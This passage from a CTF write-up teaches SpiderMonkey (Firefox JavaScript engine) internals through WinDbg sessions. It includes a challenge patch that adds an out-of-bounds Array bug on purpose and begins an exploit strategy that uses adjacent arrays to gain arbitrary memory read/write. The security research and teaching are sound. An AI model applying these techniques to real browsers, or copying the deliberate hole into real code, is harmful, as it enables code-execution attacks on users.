  • The scripts I used to build the Bring Your Own Payload technique in scripts,
  • The sources that have been used to build js-release so that you can do source-level debugging in WinDbg in src/js,
  • A 64-bit build of the Firefox binaries along with private symbol information for xul.dll in ff-bin.7z.001 and ff-bin.7z.002.

All right, let's buckle up and hit the road now!

Setting it up

Naturally we are going to have to set-up a debugging environment. I would suggest to create a virtual machine for this as you are going to have to install a bunch of stuff you might not want to install on your personal machine.

First things first, let's get the code. Mozilla uses mercurial for development, but they also maintain a read-only GIT mirror. I recommend to just shallow clone this repository to make it faster (the repository is about ~420MB):

>git clone --depth 1 https://github.com/mozilla/gecko-dev.git
Cloning into 'gecko-dev'...
remote: Enumerating objects: 264314, done.
remote: Counting objects: 100% (264314/264314), done.
remote: Compressing objects: 100% (211568/211568), done.
remote: Total 264314 (delta 79982), reused 140844 (delta 44268), pack-reused 0 receiving objects: 100% (264314/26431
Receiving objects: 100% (264314/264314), 418.27 MiB | 981.00 KiB/s, done.
Resolving deltas: 100% (79982/79982), done.
Checking out files: 100% (261054/261054), done.

Sweet. For now we are interested only in building the JavaScript Shell interpreter that is part of the SpiderMonkey tree. js.exe is a simple command-line utility that can run JavaScript code. It is much faster to compile but also more importantly easier to attack and reason about. We already are about to be dropped in a sea of code so let's focus on something smaller first.

Before compiling though, grab the blaze.patch file (no need to understand it just yet):

diff -r ee6283795f41 js/src/builtin/Array.cpp
--- a/js/src/builtin/Array.cpp  Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.cpp  Sun Apr 08 00:01:23 2018 +0000
@@ -192,6 +192,20 @@
     return ToLength(cx, value, lengthp);
 }

+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+    if (obj->is<ArrayObject>()) {
+        obj->as<ArrayObject>().setLengthInt32(length);
+        obj->as<ArrayObject>().setCapacityInt32(length);
+        obj->as<ArrayObject>().setInitializedLengthInt32(length);
+        return true;
+    }
+    return false;
+}
+
+
+
 /*
  * Determine if the id represents an array index.
  *
@@ -1578,6 +1592,23 @@
     return DenseElementResult::Success;
 }

+bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp)
+{
+    CallArgs args = CallArgsFromVp(argc, vp);
+    RootedObject obj(cx, ToObject(cx, args.thisv()));
+    if (!obj)
+        return false;
+
+    if (!BlazeSetLengthProperty(cx, obj, 420))
+        return false;
+
+    //uint64_t l = obj.as<ArrayObject>().setLength(cx, 420);
+
+    args.rval().setObject(*obj);
+    return true;
+}
+
+
 // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce
 // 22.1.3.21 Array.prototype.reverse ( )
 bool
@@ -3511,6 +3542,8 @@
     JS_FN("unshift",            array_unshift,      1,0),
     JS_FNINFO("splice",         array_splice,       &array_splice_info, 2,0),

+    JS_FN("blaze",            array_blaze,      0,0),
+
     /* Pythonic sequence methods. */
     JS_SELF_HOSTED_FN("concat",      "ArrayConcat",      1,0),
     JS_INLINABLE_FN("slice",    array_slice,        2,0, ArraySlice),
diff -r ee6283795f41 js/src/builtin/Array.h
--- a/js/src/builtin/Array.h    Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.h    Sun Apr 08 00:01:23 2018 +0000
@@ -166,6 +166,9 @@
 array_reverse(JSContext* cx, unsigned argc, js::Value* vp);

 extern bool
+array_blaze(JSContext* cx, unsigned argc, js::Value* vp);
+
+extern bool
 array_splice(JSContext* cx, unsigned argc, js::Value* vp);

 extern const JSJitInfo array_splice_info;
diff -r ee6283795f41 js/src/vm/ArrayObject.h
--- a/js/src/vm/ArrayObject.h   Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/vm/ArrayObject.h   Sun Apr 08 00:01:23 2018 +0000
@@ -60,6 +60,14 @@
         getElementsHeader()->length = length;
     }

+    void setCapacityInt32(uint32_t length) {
+        getElementsHeader()->capacity = length;
+    }
+
+    void setInitializedLengthInt32(uint32_t length) {
+        getElementsHeader()->initializedLength = length;
+    }
+
     // Make an array object with the specified initial state.
     static inline ArrayObject*
     createArray(JSContext* cx,

Apply the patch like in the below and just double-check it has been properly applied (you should not run into any conflicts):

>cd gecko-dev\js

gecko-dev\js>git apply c:\work\codes\blazefox\blaze.patch

gecko-dev\js>git diff
diff --git a/js/src/builtin/Array.cpp b/js/src/builtin/Array.cpp
index 1655adbf58..e2ee96dd5e 100644
--- a/js/src/builtin/Array.cpp
+++ b/js/src/builtin/Array.cpp
@@ -202,6 +202,20 @@ GetLengthProperty(JSContext* cx, HandleObject obj, uint64_t* lengthp)
     return ToLength(cx, value, lengthp);
 }

+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+    if (obj->is<ArrayObject>()) {
+        obj->as<ArrayObject>().setLengthInt32(length);
+        obj->as<ArrayObject>().setCapacityInt32(length);
+        obj->as<ArrayObject>().setInitializedLengthInt32(length);
+        return true;
+    }
+    return false;
+}

At this point you can install Mozilla-Build which is a meta-installer that provides you every tools necessary to do development (toolchain, various scripts, etc.) on Mozilla. The latest available version at the time of writing is the version 3.2 which is available here: MozillaBuildSetup-3.2.exe.

Once this is installed, start-up a Mozilla shell by running the start-shell.bat batch file. Go to the location of your clone in js\src folder and type the following to configure an x64 debug build of js.exe:

over@compiler /d/gecko-dev/js/src$ autoconf-2.13

over@compiler /d/gecko-dev/js/src$ mkdir build.asserts

over@compiler /d/gecko-dev/js/src$ cd build.asserts

over@compiler /d/gecko-dev/js/src/build.asserts$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --enable-debug

Kick off the compilation with mozmake:

over@compiler /d/gecko-dev/js/src/build.asserts$ mozmake -j2

Then, you should be able to toss ./js/src/js.exe, ./mozglue/build/mozglue.dll and ./config/external/nspr/pr/nspr4.dll in a directory and voilà:

over@compiler ~/mozilla-central/js/src/build.asserts/js/src
$ js.exe --version
JavaScript-C64.0a1

For an optimized build you can invoke configure this way:

over@compiler /d/gecko-dev/js/src/build.opt$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --disable-debug --enable-optimize

SpiderMonkey

Background

SpiderMonkey is the name of Mozilla's JavaScript engine, its source code is available on Github via the gecko-dev repository (under the js directory). SpiderMonkey is used by Firefox and more precisely by Gecko, its web-engine. You can even embed the interpreter in your own third-party applications if you fancy it. The project is fairly big, and here are some rough stats about it:

  • ~3k Classes,
  • ~576k Lines of code,
  • ~1.2k Files,
  • ~48k Functions.

As you can see on the tree map view below (the bigger, the more lines; the darker the blue, the higher the cyclomatic complexity) the engine is basically split in six big parts: the JIT compilers engine called Baseline and IonMonkey in the jit directory, the front-end in the frontend directory, the JavaScript virtual-machine in the vm directory, a bunch of builtins in the builtin directory, a garbage collector in the gc directory, and... WebAssembly in the wasm directory.

MetricsTreemap-CountLine-MaxCyclomatic.png

Most of the stuff I have looked at for now live in vm, builtin and gc folders. Another good thing going on for us is that there is also a fair amount of public documentation about SpiderMoneky, its internals, design, etc.

Here are a few links that I found interesting (some might be out of date, but at this point we are just trying to digest every bit of public information we can find) if you would like to get even more background before going further:

JS::Values and JSObjects

The first thing you might be curious about is how native JavaScript object are laid out in memory. Let's create a small script file with a few different native types and dump them directly from memory (do not forget to load the symbols). Before doing that though, a useful trick to know is to set a breakpoint to a function that is rarely called, like Math.atan2 for example. As you can pass arbitrary JavaScript objects to the function, it is then very easy to retrieve its address from inside the debugger. You can also use objectAddress which is only accessible in the shell but is very useful at times.

js> a = {}
({})

js> objectAddress(a)
"000002576F8801A0"

Another pretty useful method is dumpObject but this one is only available from a debug build of the shell:

js> a = {doare : 1}
({doare:1})

js> dumpObject(a)
object 20003e8e160
  global 20003e8d060 [global]
  class 7ff624d94218 Object
  lazy group
  flags:
  proto <Object at 20003e90040>
  properties:
    "doare": 1 (shape 20003eb1ad8 enumerate slot 0)

There are a bunch of other potentially interesting utility functions exposed to JavaScript via the shell and If you would like to enumerate them you can run Object.getOwnPropertyNames(this):

js> Object.getOwnPropertyNames(this)
["undefined", "Boolean", "JSON", "Date", "Math", "Number", "String", "RegExp", "InternalError", "EvalError", "RangeError", "TypeError", "URIError", "ArrayBuffer", "Int8Array", "Uint8Array", "Int16Array", "Uint16Array", "Int32Array", "Uint32Array", "Float32Array", "Float64Array", "Uint8ClampedArray", "Proxy", "WeakMap", "Map", ..]

To break in the debugger when the Math.atan2 JavaScript function is called you can set a breakpoint on the below symbol:

0:001> bp js!js::math_atan2

Now just create a foo.js file with the following content:

'use strict';

const Address = Math.atan2;

const A = 0x1337;
Address(A);

const B = 13.37;
Address(B);

const C = [1, 2, 3, 4, 5];
Address(C);

At this point you have two choices: either you load the above script into the JavaScript shell and attach a debugger or what I encourage is to trace the program execution with TTD. It makes things so much easier when you are trying to investigate complex software. If you have never tried it, do it now and you will understand.

Time to load the trace and have a look around:

0:001> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> lsa .
   260: }
   261: 
   262: bool
   263: js::math_atan2(JSContext* cx, unsigned argc, Value* vp)
>  264: {
   265:     CallArgs args = CallArgsFromVp(argc, vp);
   266: 
   267:     return math_atan2_handle(cx, args.get(0), args.get(1), args.rval());
   268: }
   269: 

At this point you should be broken into the debugger like in the above. To be able to inspect the passed JavaScript object, we need to understand how JavaScript arguments are passed to native C++ function.

The way it works is that vp is a pointer to an array of JS::Value pointers of size argc + 2 (one is reserved for the return value / the caller and one is used for the this object). Functions usually do not access the array via vp directly. They wrap it in a JS::CallArgs object that abstracts away the need to calculate the number of JS::Value as well as providing useful functionalities like: JS::CallArgs::get, JS::CallArgs::rval, etc. It also abstracts away GC related operations to properly keep the object alive. So let's just dump the memory pointed by vp:

0:000> dqs @r8 l@rdx+2
0000028f`87ab8198  fffe028f`877a9700
0000028f`87ab81a0  fffe028f`87780180
0000028f`87ab81a8  fff88000`00001337

First thing we notice is that every Value objects sound to have their high-bits set. Usually, it is a sign of clever hax to encode more information (type?) in a pointer as this part of the address space is not addressable from user-mode on Windows.

At least we recognize the 0x1337 value which is something. Let's move on to the second invocation of Addressnow:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000028f`87ab8198  fffe028f`877a9700
0000028f`87ab81a0  fffe028f`87780180
0000028f`87ab81a8  402abd70`a3d70a3d

0:000> .formats 402abd70`a3d70a3d
Evaluate expression:
  Hex:     402abd70`a3d70a3d
  Double:  13.37

Another constant we recognize. This time, the entire quad-word is used to represent the double value. And finally, here is the Array object passed to the third invocation of Address:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000028f`87ab8198  fffe028f`877a9700
0000028f`87ab81a0  fffe028f`87780180
0000028f`87ab81a8  fffe028f`87790400

Interesting. Well, if we look at the JS::Value structure it sounds like the lower part of the quad-word is a pointer to some object.

0:000> dt -r2 js::value
   +0x000 asBits_          : Uint8B
   +0x000 asDouble_        : Float
   +0x000 s_               : JS::Value::<unnamed-type-s_>
      +0x000 payload_         : JS::Value::<unnamed-type-s_>::<unnamed-type-payload_>
         +0x000 i32_             : Int4B
         +0x000 u32_             : Uint4B
         +0x000 why_             : JSWhyMagic

By looking at public/Value.h we quickly understand what is going with what we have seen above. The 17 higher bits (referred to as the JSVAL_TAG in the source-code) of a JS::Value is used to encode type information. The lower 47 bits (referred to as JSVAL_TAG_SHIFT) are either the value of trivial types (integer, booleans, etc.) or a pointer to a JSObject. This part is called the payload_.

union alignas(8) Value {
  private:
    uint64_t asBits_;
    double asDouble_;

    struct {
        union {
            int32_t i32_;
            uint32_t u32_;
            JSWhyMagic why_;
        } payload_;

Now let's take for example the JS::Value 0xfff8800000001337. To extract its tag we can right shift it with 47, and to extract the payload (an integer here, a trivial type) we can mask it with 2**47 - 1. Same with the array JS::Value from above.

In [5]: v = 0xfff8800000001337

In [6]: hex(v >> 47)
Out[6]: '0x1fff1L'

In [7]: hex(v & ((2**47) - 1))
Out[7]: '0x1337L'

In [8]: v = 0xfffe028f877a9700 

In [9]: hex(v >> 47)
Out[9]: '0x1fffcL'

In [10]: hex(v & ((2**47) - 1))
Out[10]: '0x28f877a9700L'

jsvalue_taggedpointer

The 0x1fff1 constant from above is JSVAL_TAG_INT32 and 0x1fffc is JSVAL_TAG_OBJECT as defined in JSValueType which makes sense:

enum JSValueType : uint8_t
{
    JSVAL_TYPE_DOUBLE              = 0x00,
    JSVAL_TYPE_INT32               = 0x01,
    JSVAL_TYPE_BOOLEAN             = 0x02,
    JSVAL_TYPE_UNDEFINED           = 0x03,
    JSVAL_TYPE_NULL                = 0x04,
    JSVAL_TYPE_MAGIC               = 0x05,
    JSVAL_TYPE_STRING              = 0x06,
    JSVAL_TYPE_SYMBOL              = 0x07,
    JSVAL_TYPE_PRIVATE_GCTHING     = 0x08,
    JSVAL_TYPE_OBJECT              = 0x0c,

    // These never appear in a jsval; they are only provided as an out-of-band
    // value.
    JSVAL_TYPE_UNKNOWN             = 0x20,
    JSVAL_TYPE_MISSING             = 0x21
};

JS_ENUM_HEADER(JSValueTag, uint32_t)
{
    JSVAL_TAG_MAX_DOUBLE           = 0x1FFF0,
    JSVAL_TAG_INT32                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_INT32,
    JSVAL_TAG_UNDEFINED            = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_UNDEFINED,
    JSVAL_TAG_NULL                 = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_NULL,
    JSVAL_TAG_BOOLEAN              = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_BOOLEAN,
    JSVAL_TAG_MAGIC                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_MAGIC,
    JSVAL_TAG_STRING               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_STRING,
    JSVAL_TAG_SYMBOL               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_SYMBOL,
    JSVAL_TAG_PRIVATE_GCTHING      = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_PRIVATE_GCTHING,
    JSVAL_TAG_OBJECT               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_OBJECT
} JS_ENUM_FOOTER(JSValueTag);

Now that we know what is a JS::Value, let's have a look at what an Array looks like in memory as this is will become useful later. Restart the target and skip the first double breaks:

0:000> .restart /f

0:008> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000027a`bf5b8198  fffe027a`bf2a9480
0000027a`bf5b81a0  fffe027a`bf280140
0000027a`bf5b81a8  fffe027a`bf2900a0

0:000> dqs 27a`bf2900a0
0000027a`bf2900a0  0000027a`bf27ab20
0000027a`bf2900a8  0000027a`bf2997e8
0000027a`bf2900b0  00000000`00000000
0000027a`bf2900b8  0000027a`bf2900d0
0000027a`bf2900c0  00000005`00000000
0000027a`bf2900c8  00000005`00000006
0000027a`bf2900d0  fff88000`00000001
0000027a`bf2900d8  fff88000`00000002
0000027a`bf2900e0  fff88000`00000003
0000027a`bf2900e8  fff88000`00000004
0000027a`bf2900f0  fff88000`00000005
0000027a`bf2900f8  4f4f4f4f`4f4f4f4f

At this point we recognize the content the array: it contains five integers encoded as JS::Value from 1 to 5. We can also kind of see what could potentially be a size and a capacity but it is hard to guess the rest.

0:000> dt JSObject
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : Ptr64 Void

0:000> dt js::NativeObject
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : Ptr64 Void
   +0x010 slots_           : Ptr64 js::HeapSlot
   +0x018 elements_        : Ptr64 js::HeapSlot

0:000> dt js::ArrayObject
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : Ptr64 Void
   +0x010 slots_           : Ptr64 js::HeapSlot
   +0x018 elements_        : Ptr64 js::HeapSlot

The JS::ArrayObject is defined in the vm/ArrayObject.h file and it subclasses the JS::NativeObject class (JS::NativeObject subclasses JS::ShapedObject which naturally subclasses JSObject). Note that it is also basically subclassed by every other JavaScript objects as you can see in the below diagram:

Butterfly-NativeObject.png

A native object in SpiderMonkey is basically made of two components:

  1. a shape object which is used to describe the properties, the class of the said object, more on that just a bit below (pointed by the field shapeOrExpando_).
  2. storage to store elements or the value of properties.

Let's switch gears and have a look at how object properties are stored in memory.

Shapes

As mentioned above, the role of a shape object is to describe the various properties that an object has. You can, conceptually, think of it as some sort of hash table where the keys are the property names and the values are the slot number of where the property content is actually stored.

Before reading further though, I recommend that you watch a very short presentation made by @bmeurer and @mathias describing how properties are stored in JavaScript engines: JavaScript engine fundamentals: Shapes and Inline Caches. As they did a very good job of explaining things clearly, it should help clear up what comes next and it also means I don't have to introduce things as much.

Consider the below JavaScript code:

'use strict';

const Address = Math.atan2;

const A = {
    foo : 1337,
    blah : 'doar-e'
};
Address(A);

const B = {
    foo : 1338,
    blah : 'sup'
};
Address(B);

const C = {
    foo : 1338,
    blah : 'sup'
};
C.another = true;
Address(C);

Throw it in the shell under your favorite debugger to have a closer look at this shape object:

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1c0

0:000> dt js::NativeObject 1fc`e637e1c0 shapeOrExpando_
   +0x008 shapeOrExpando_ : 0x000001fc`e63ae880 Void

0:000> ?? ((js::shape*)0x000001fc`e63ae880)
class js::Shape * 0x000001fc`e63ae880
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : 0x2000001
   +0x014 attrs            : 0x1 ''
   +0x015 mutableFlags     : 0 ''
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : (null) 

0:000> ?? ((js::shape*)0x000001fc`e63ae880)->propid_.value
struct jsid
   +0x000 asBits           : 0x000001fc`e63a7e20

In the implementation, a JS::Shape describes a single property; its name and slot number. To describe several of them, shapes are linked together via the parent field (and others). The slot number (which is used to find the property content later) is stored in the lower bits of the immutableFlags field. The property name is stored as a jsid in the propid_ field.

I understand this is a lot of abstract information thrown at your face right now. But let's peel the onion to clear things up; starting with a closer look at the above shape. This JS::Shape object describes a property which value is stored in the slot number 1 (0x2000001 & SLOT_MASK). To get its name we dump its propid_ field which is 0x000001fce63a7e20.

What is a jsid? A jsid is another type of tagged pointer where type information is encoded in the lower three bits this time.

jsid

Thanks to those lower bits we know that this address is pointing to a string and it should match one of our property name :).

0:000> ?? (char*)((JSString*)0x000001fc`e63a7e20)->d.inlineStorageLatin1
char * 0x000001fc`e63a7e28
 "blah"

Good. As we mentioned above, shape objects are linked together. If we dump its parent we expect to find the shape that described our second property foo:

0:000> ?? ((js::shape*)0x000001fc`e63ae880)->parent.value
class js::Shape * 0x000001fc`e63ae858
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : 0x2000000
   +0x014 attrs            : 0x1 ''
   +0x015 mutableFlags     : 0x2 ''
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : 0x000001fc`e63ae880 js::GCPtr<js::Shape *>

0:000> ?? ((js::shape*)0x000001fc`e63ae880)->parent.value->propid_.value
struct jsid
   +0x000 asBits           : 0x000001fc`e633d700

0:000> ?? (char*)((JSString*)0x000001fc`e633d700)->d.inlineStorageLatin1
char * 0x000001fc`e633d708
 "foo"

Press g to continue the execution and check if the second object shares the same shape hierarchy (0x000001fce63ae880):

0:000> g
Breakpoint 0 hit
Time Travel Position: D484:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1f0

0:000> dt js::NativeObject 1fc`e637e1f0 shapeOrExpando_
   +0x008 shapeOrExpando_ : 0x000001fc`e63ae880 Void

As expected B indeed shares it even though A and B store different property values. Care to guess what is going to happen when we add another property to C now? To find out, press g one last time:

0:000> g
Breakpoint 0 hit
Time Travel Position: D493:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
union JS::Value
   +0x000 asBits_          : 0xfffe01e7`c247e1c0

0:000> dt js::NativeObject 1fc`e637e1f0 shapeOrExpando_
   +0x008 shapeOrExpando_ : 0x000001fc`e63b10d8 Void

0:000> ?? ((js::shape*)0x000001fc`e63b10d8)
class js::Shape * 0x000001fc`e63b10d8
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : 0x2000002
   +0x014 attrs            : 0x1 ''
   +0x015 mutableFlags     : 0 ''
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : (null) 

0:000> ?? ((js::shape*)0x000001fc`e63b10d8)->propid_.value
struct jsid
   +0x000 asBits           : 0x000001fc`e63a7e60

0:000> ?? (char*)((JSString*)0x000001fc`e63a7e60)->d.inlineStorageLatin1
char * 0x000001fc`e63a7e68
 "another"

0:000> ?? ((js::shape*)0x000001fc`e63b10d8)->parent.value
class js::Shape * 0x000001fc`e63ae880

A new JS::Shape gets allocated (0x000001e7c24b1150) and its parent is the previous set of shapes (0x000001e7c24b1150). A bit like prepending a node in a linked-list.

shapes

Slots

In the previous section, we talked a lot about how property names are stored in memory. Now where are property values?

To answer this question we throw the previous TTD trace we acquired in our debugger and go back at the first call to Math.atan2:

Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1c0  

Because we went through the process of dumping the js::Shape objects describing the foo and the blah properties already, we know that their property values are respectively stored in slot zero and slot one. To look at those, we just dump the memory right after the js::NativeObject:

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1c0
0:000> dt js::NativeObject 1fce637e1c0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x000001fc`e63ae880 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`7707dac0 js::HeapSlot

0:000> dqs 1fc`e637e1c0
000001fc`e637e1c0  000001fc`e637a520
000001fc`e637e1c8  000001fc`e63ae880
000001fc`e637e1d0  00000000`00000000
000001fc`e637e1d8  00007ff7`7707dac0 js!emptyElementsHeader+0x10
000001fc`e637e1e0  fff88000`00000539 <- foo
000001fc`e637e1e8  fffb01fc`e63a7e40 <- blah

Naturally, the second property is another js::Value pointing to a JSString and we can dump it as well:

0:000> ?? (char*)((JSString*)0x1fce63a7e40)->d.inlineStorageLatin1
char * 0x000001fc`e63a7e48
 "doar-e"

Here is a diagram describing the hierarchy of objects to clear any potential confusion:

properties.svg

This is really as much internals as I wanted to cover as it should be enough to be understand what follows. You should also be able to inspect most JavaScript objects with this background. The only sort-of of odd-balls I have encountered are JavaScript Arrays that stores the length property, for example in an js::ObjectElements object; but that is about it.

0:000> dt js::ObjectElements
   +0x000 flags            : Uint4B
   +0x004 initializedLength : Uint4B
   +0x008 capacity         : Uint4B
   +0x00c length           : Uint4B

Exploits

Now that we all are SpiderMonkey experts, let's have a look at the actual challenge. Note that clearly we did not need the above context to just write a simple exploit. The thing is, just writing an exploit was never my goal.

The vulnerability

After taking a closer look at the blaze.patch diff it becomes pretty clear that the author has added a method to Array objects called blaze. This new method changes the internal size field to 420, because it was Blaze CTF after all :). This allows us to access out-of-bound off the backing buffer.

js> blz = []
[]

js> blz.length
0

js> blz.blaze() == undefined
false

js> blz.length
420

One little quirk to keep in mind when using the debug build of js.exe is that you need to ensure that the blaze'd object is never displayed by the interpreter. If you do, the toString() function of the array iterates through every items and invokes their toString()'s. This basically blows up once you start reading out-of-bounds, and will most likely run into the below crash:

js> blz.blaze()
Assertion failure: (ptrBits & 0x7) == 0, at c:\Users\over\mozilla-central\js\src\build-release.x64\dist\include\js/Value.h:809

(1d7c.2b3c): Break instruction exception - code 80000003 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for c:\work\codes\blazefox\js-asserts\js.exe
js!JS::Value::toGCThing+0x75 [inlined in js!JS::MutableHandle<JS::Value>::set+0x97]:
00007ff6`ac86d7d7 cc              int     3

An easy work-around for this annoyance is to either provide a file directly to the JavaScript shell or to use an expression that does not return the resulting array, like blz.blaze() == undefined. Note that, naturally, you will not encounter the above assertion in the release build.

basic.js

As introduced above, our goal with this exploit is to pop calc. We don't care about how unreliable or crappy the exploit is: we just want to get native code execution inside the JavaScript shell. For this exploit, I have exploited a debug build of the shell where asserts are enabled. I encourage you to follow, and for that I have shared the binaries (along with symbol information) here: js-asserts.

With an out-of-bounds like this one what we want is to have two adjacent arrays and use the first one to corrupt the second one. With this set-up, we can convert a limited relative memory read / write access primitive to an arbitrary read / write primitive.

Now, we have to keep in mind that Arrays store js::Values and not raw values. If you were to out-of-bounds write the value 0x1337 in JavaScript, you would actually write the value 0xfff8800000001337 in memory. It felt a bit weird at the beginning, but as usual you get used to this type of thing pretty quickly :-).

Anyway moving on: time to have a closer look at Arrays. For that, I highly recommend grabbing an execution trace of a simple JavaScript file creating arrays with TTD. Once traced, you can load it in the debugger in order to figure out how Arrays are allocated and where.

Note that to inspect JavaScript objects from the debugger I use a JavaScript extension I wrote called sm.js that you can find here.

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D5DC:D
js!js::math_atan2:
00007ff7`4704e140 56              push    rsi

0:000> !smdump_jsvalue vp[2].asBits_
25849101b00: js!js::ArrayObject:   Length: 4
25849101b00: js!js::ArrayObject: Capacity: 6
25849101b00: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_)

0:000>  dx -g @$cursession.TTD.Calls("js!js::allocate<JSObject,js::NoGC>").Where(p => p.ReturnValue == 0x25849101b00)
=====================================================================================================================================================================================================================
=           = (+) EventType = (+) ThreadId = (+) UniqueThreadId = (+) TimeStart = (+) TimeEnd = (+) Function                          = (+) FunctionAddress = (+) ReturnAddress = (+) ReturnValue  = (+) Parameters =
=====================================================================================================================================================================================================================
= [0x14]    - Call          - 0x32f8       - 0x2                - D58F:723      - D58F:77C    - js!js::Allocate<JSObject,js::NoGC>    - 0x7ff746f841b0      - 0x7ff746b4b702    - 0x25849101b00    - {...}          =
=====================================================================================================================================================================================================================

0:000> !tt D58F:723 
Setting position: D58F:723
Time Travel Position: D58F:723
js!js::Allocate<JSObject,js::NoGC>:
00007ff7`46f841b0 4883ec28        sub     rsp,28h

0:000> kc
 # Call Site
00 js!js::Allocate<JSObject,js::NoGC>
01 js!js::NewObjectCache::newObjectFromHit
02 js!NewArrayTryUseGroup<4294967295>
03 js!js::NewCopiedArrayForCallingAllocationSite
04 js!ArrayConstructorImpl
05 js!js::ArrayConstructor
06 js!InternalConstruct
07 js!Interpret
08 js!js::RunScript
09 js!js::ExecuteKernel
0a js!js::Execute
0b js!JS_ExecuteScript
0c js!Process
0d js!main
0e js!__scrt_common_main_seh
0f KERNEL32!BaseThreadInitThunk
10 ntdll!RtlUserThreadStart

0:000> dv
           kind = OBJECT8_BACKGROUND (0n9)
  nDynamicSlots = 0
           heap = DefaultHeap (0n0)

Cool. According to the above, new Array(1, 2, 3, 4) is allocated from the Nursery heap (or DefaultHeap) and is an OBJECT8_BACKGROUND. This kind of objects are 0x60 bytes long as you can see below:

0:000> x js!js::gc::Arena::ThingSizes
00007ff7`474415b0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7`474415b0 + 9*4 l1
00007ff7`474415d4  00000060

The Nursery heap is 16MB at most (by default, but can be tweaked with the --nursery-size option). One thing nice for us about this allocator is that there is no randomization whatsoever. If we allocate two arrays, there is a high chance that they are adjacent in memory. The other awesome thing is that TypedArrays are allocated there too.

As a first experiment we can try to have an Array and a TypedArray adjacent in memory and confirm things in a debugger. The script I used is pretty dumb as you can see:

const Smalls = new Array(1, 2, 3, 4);
const U8A = new Uint8Array(8);

Let's have a look at it from the debugger now:

(2ab8.22d4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007fff`b8c33050 cc              int     3
0:005> bp js!js::math_atan2

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`4704e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe013e`bb2019e0

0:000> .scriptload c:\work\codes\blazefox\sm\sm.js
JavaScript script successfully loaded from 'c:\work\codes\blazefox\sm\sm.js'

0:000> !smdump_jsvalue vp[2].asBits_
13ebb2019e0: js!js::ArrayObject:   Length: 4
13ebb2019e0: js!js::ArrayObject: Capacity: 6
13ebb2019e0: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_)

0:000> ? 0xfffe013e`bb2019e0 + 60
Evaluate expression: -561581014377920 = fffe013e`bb201a40

0:000> !smdump_jsvalue 0xfffe013ebb201a40
13ebb201a40: js!js::TypedArrayObject:       Type: Uint8Array
13ebb201a40: js!js::TypedArrayObject:     Length: 8
13ebb201a40: js!js::TypedArrayObject: ByteLength: 8
